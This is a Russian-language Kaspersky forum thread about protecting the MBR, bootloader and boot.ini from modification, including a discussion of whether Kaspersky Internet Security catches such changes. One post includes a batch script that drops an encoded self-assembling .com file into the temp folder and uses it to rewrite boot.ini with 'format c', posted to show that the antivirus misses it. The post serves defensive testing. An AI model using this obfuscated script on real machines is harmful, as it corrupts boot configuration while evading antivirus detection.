Перейти к содержанию

Рекомендуемые сообщения

Опубликовано

Собственно как защитить?. Интересует MBR, ntldr(bootmgr), boot.ini

Опубликовано
Уникальные технологии и разработки «Лаборатории Касперского» защищают вас от современных интернет-угроз:

 

Вирусов, троянских программ, червей и других вредоносных, шпионских и рекламных программ

Руткитов, буткитов и других сложных угроз

Кражи личных данных с применением клавиатурных шпионов, программ, делающих снимки экрана, и фишинговых схем

Ботнетов и других незаконных способов перехвата управления вашим компьютером

Новейших видов атак, а также вновь возникающих и неизвестных угроз

Заражений методом drive-by загрузки, сетевых атак и вторжений

Нежелательного веб-контента и спама

Думаю, дополнительно ничего делать не нужно.
Опубликовано
Собственно как защитить?. Интересует MBR, ntldr(bootmgr), boot.ini

содержать в актуальном состоянии базы и модули продукта :lol:

Опубликовано
содержать в актуальном состоянии базы и модули продукта :lol:

Согласен. В новом SW, который приходит с базами есть обновляемая "защита" от буткитов.

Опубликовано (изменено)
Думаю, дополнительно ничего делать не нужно.
содержать в актуальном состоянии базы и модули продукта

 

Наверное я не так выразился. Все таки запретить изменения пользователем загрузчиков.

GRUB я не стал запускать, Но думаю КИС на него не сработает. Спокойно переместил(стер) ntldr. А вот с boot.ini немного усложнил задачу. Воспользовался довольно известным кодом замены строк(в данном примере код изменен):

@echo off

:: Create the assembler program, by Herbert Kleebauer

echo hfjkdspj@jzh`0X-`/PPPPPPa(DE(DM(DO(Dh(Ls(Lu(LX(LeZRR]EEEUYRX2Dx=> %temp%.\sbs2.com

echo 0DxFP,0Xx.t0P,=XtGsB4o@$?PIyU!WvX0GwUY Wv;ovBX2Gv0ExGIuht6>> %temp%.\sbs2.com

echo ?@}IKuNWpe~Fpe?FNHlF?wGMECIQqo{Ox{T?kPv@jeoSeIlRFD@{AyEKj@>> %temp%.\sbs2.com

echo iqe~1NeAyR?mHAG~BGRgB{~H?o~TsdgCYqe?HR~upkpBG?~slJBCyA?@xA>> %temp%.\sbs2.com

echo LZp{xq`Cs?H[C_vHDyB?Hos@QslFA@wQ~~x}viH}`LYNBGyA?@xAB?sUq`>> %temp%.\sbs2.com

echo LRy@PwtCYQEuFK@A~BxPtDss@fFqjVmzD@qBEOEenU?`eHHeBCMs?FExep>> %temp%.\sbs2.com

echo LHsPBGyA?@xAunjzA}EKNs@CA?wQpQpKLBHv?s`WJ`LRCYyIWMJaejCksl>> %temp%.\sbs2.com

echo H[GyFGhHBwHZjjHeoFasuFUJeHeB?OsQH[xeHCPvqFj@oq@eNc?~}Nu?O>> %temp%.\sbs2.com

echo ~oEwoAjBKs?Zp`LBzHQzyEFrAWAG{EFrAqAGYwHTECIQ{coKIsaCsf{Oe~>> %temp%.\sbs2.com

echo CK}Ayre~CNFA{rAyEKFACrA{EKGAjbA}eKGSjNMtQFtc{OAyDGFj?{FDGQ>> %temp%.\sbs2.com

echo KAjNVk_OCAx@e?f{o?CosI}1EGizhljJ~H1ZeG}JBA~rACBMDGjjDG@g0>> %temp%.\sbs2.com

:: Use the program

%temp%.\sbs2.com 0 "[boot loader]" "format c" < с:\boot.ini > с:\boot.in

:: Delete the program

del %temp%.\sbs2.com

boot.ini соответственно изменен и КИС молчит. Почему и спрашиваю о возможности защиты.

 

PS кто мешает злоумышленнику прислать этот батник пользователю(((

Изменено пользователем sandkey
Опубликовано

sandkey

Можно оригинал в ЛС? Посмотрю на виртуалке.

Опубликовано
Наверное я не так выразился. Все таки запретить изменения пользователем загрузчиков.

GRUB я не стал запускать, Но думаю КИС на него не сработает. Спокойно переместил(стер) ntldr. А вот с boot.ini немного усложнил задачу. Воспользовался довольно известным кодом замены строк(в данном примере код изменен):

................................................................................

..................

boot.ini соответственно изменен и КИС молчит. Почему и спрашиваю о возможности защиты.

 

PS кто мешает злоумышленнику прислать этот батник пользователю(((

1. Включен автоматический режим или интерактивный?

2. Если включить интерактивный и руками перенести этот батник в слабые ограничения, KIS промолчит?

Опубликовано
Наверное я не так выразился. Все таки запретить изменения пользователем загрузчиков.

думаю, что это решается на уровне пользовательских учетных записей.

GRUB я не стал запускать, Но думаю КИС на него не сработает.

груб работает до загрузки ОС, так что никакой антивирус, не может на него сработать по умолчанию.

кто мешает злоумышленнику прислать этот батник пользователю

а зачем запускать все подряд батники? вообще обычный юзер нынче пользуется батниками? сомнительно

Опубликовано (изменено)
1. Включен автоматический режим или интерактивный?

2. Если включить интерактивный и руками перенести этот батник в слабые ограничения, KIS промолчит?

Был включен автомат. Переключил в интерактив, батник в слабые ограничения сам встал, хм, а вот создаваемого батником ком-файла ни в контроле программ ни в отчете нигде нет. КИС молчит.

груб работает до загрузки ОС

Я имел ввиду запуск инсталятора груба для его установки при запущенном каспере.

вообще обычный юзер нынче пользуется батниками?
о

Ну в данном случае батник создает ком файл на ассемблере(есно без цифровой подписи) и он спокойно запускается

Изменено пользователем sandkey
Опубликовано (изменено)
Ну в данном случае батник создает ком файл на ассемблере(есно без цифровой подписи) и он спокойно запускается

Я у себя обычно (не сейчас) ставлю запрос на запуск всех программ не попавших в доверенные. Для меня этого достаточно.

А если прикрутить "костыль", как написано в сообщении №10?

Хотя, гораздо проще сидеть с ограниченными правами, впрочем - это на любителя.

Изменено пользователем Drru
Опубликовано
А если прикрутить "костыль", как написано в сообщении №10?

Ага, спасибо читаю как раз эту ветку.

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • ska79
      Автор ska79
      В статье указано что можно поделиться защитой https://support.kaspersky.ru/my-kaspersky/134048
      Вопрос распространяется ли возможность поделиться защитой на устройство с ос андроид?
      Возникли сомнения так как, если не ошибаюсь, активация вшита в установщик которы можно будет скачать по ссылке из мейла.
       
    • Tapunok
      Автор Tapunok
      Открыл хром паралельно к игре, пк залагал и вылез синий экран с просьбой перезагрузить пк, перезагрузил и начало вылазить это сообщение. Друзья говорят винда слетела но я в пк не разбираюсь а тем более в биос


    • 7Glasses
      Автор 7Glasses
      Всем привет! Накануне посещения узкоколейной железной дороги под Минском я успел скататься в Вилейский район на подвесные мосты реки Нарочанка, но из-за того, что выехал почти в обед, то удалось посетить только два моста из четырех.
      Мосты находятся на удалении примерно в 100 км. от г.Минска если ехать по трассе Р-28. Дорога вполне комфортная, но приходилось проезжать много населенных пунктов и от этого время в дороге увеличивалось. В итоге доехал где-то за 2 часа. Первый мост, который я решил посетить, находится между двумя деревнями Паромец-2 и Набережная. И он там у людей на самом деле является единственным коротким пешеходным путем на другой берег. Подъезжая к деревне Паромец-2 я наткнулся на могучий дуб, который был увешан разноцветными лентами.

      Предположу, что это местное «дерево желаний». Выглядит атмосферно и немного погружает в язычество. Паромец-2 – маленькая деревушка и хорошо, если там насчитается 10 дворов, но по ощущениям их меньше. Есть как новые современные дома, так и старые ветхие. Деревня Набережная тоже мне показалась очень маленькой. А вот и сам мост:

       
      После дождя он довольно скользкий и надо идти по нему аккуратно. Прошел туда-назад – мост приятно покачивается, но какого-то экстрима не почувствовал. Местные уже привыкли к «туристам» и не обращали на меня никакого внимания. Если честно, то этот мост меня не впечатлил. Его протяженность от силы метров 15 и он довольно прочный. Начал выбирать на какой мост ехать следующим. Решил поехать на самый ближний что около деревни Принта. И не прогадал! Там меня ждал настоящий аттракцион! Сама деревня Принта большая, люди во всю ведут свой быт. Автомобиль пришлось оставить непосредственно в самой деревне и пройти метров 500 по лесу. Кстати, возле моста тоже есть дубы, но уже без «украшений».
       
      Старый настил на мосту убрали и сделали новый, а вот перила еще не успели установить! Сам мост длиной уже метров 25 и идти по нему было просто незабываемо) Ширина моста всего 6 досок - если оступиться или сильно раскачать мост, то можно искупнуться, но, благо, падать там невысоко и глубина там всего около метра)
       
       
      Т.к. осень на дворе, то темнеть начинает рано и решил, что надо ехать назад в Минск без посещения остальных двух мостов. Оставим их на следующую поездку)
       

      Кидаю координаты мостов, если кто захочет съездить и насладиться красотами этих мест:
      Мост между деревнями Паромец-2 и Набережная: 54.500027, 26.735861
      Мост рядом с деревней Принта: 54.495244, 26.732661

       
        
        

    • АртёмБ
      Автор АртёмБ
      Недавно я обнаружил проблему, после того как я решил проверить файл антивируском Window, у меня вылезла плашка:Ваш системный администратор ограничил доступ к некоторым областям этого приложения, в том числе к элементу, к которому вы пытаетесь получить доступ.Чтобы узнать больше, свяжитесь со службой технической поддержки вашего IT-отдела.
       
       
      Проверить я решил только установившуюся взломанную яндекс музыку скачанную через гитхаб, незнаю из за нее это все началось или нет, но касперский премиум ничего там не нашел, по крайне мере в нераспакованном архиве, так как после того как эта плашка у меня вылезла, я сразу удалил все распакованное. Еще я использовал Booster X для улучшения производительности в играх, там оптимизировал все на оптимальный уровень, от чего некоторые слыжбы безопасности и другие службы отключались.
      Так же я не могу включить центр обеспечения безопасности и центр обновления Windows
       
       
      Я не смог скачать автоматический сборщик логов Safezone.сс и его зеркала, так как что то блокирует его загрузку(не использует интернет для его скачачивания), потому что со скачиванием чего то другого проблем нет,поэтому в его скачивании мне тоже нужна помощь, а также блокирует множество утилитов которые описаны в решениях этой проблемы, например файлы из Каталога Центра обновления Майкрософт(но все же я 1 момент у меня как то получилось скачать обновление Update for Windows Security platform - KB5007651 (Version 10.0.27840.1000) когда я открыл ссылку в режиме инкогнито,
       так же не могу прописывать множество команд в Win+R(выполнить) например gpedit.msc, secpol.msc.
      Ниже окно после проверки Kaspersky Virus Removal Tool
       
       
      при всем этом в диспетчере задач антивирус показывается включенным так это или нет я не знаю, со скачивание всех остальных антивирусных программ проблем тоже не было
       
       
      Вот полный отчет с последнего полного сканирования Отчет.txt (что то уже удалено)
      Возможно я не написал все что нужно так что если нужна будет дополнительная информация по чему либо пишите.
       
       
    • pacman
      Автор pacman
      В данной теме представлен обзор с подробным описанием подарочного сувенира, который получен из магазина клуба по бонусной программе, проекта «Универ Касперского 2020», за бета-тестирование и т. п.
      Пожалуйста, не обсуждайте в этой теме другие сувениры.
      .
      .
      ПЕРСОНАЛЬНАЯ ЗАЩИТА
      .
      Решение для индивидуальной защиты мужчинам, в набор которого входит:
      картонная упаковка, оформленная в виде коробочной версии одного из линеек домашних продуктов «Лаборатории Касперского»; средство контрацепции барьерного типа (презерватив), 1..5 шт.; памятка компьютерному пользователю с причинами выбора средств защиты «Лаборатории Касперского». Фотографии:
       
×
×
  • Создать...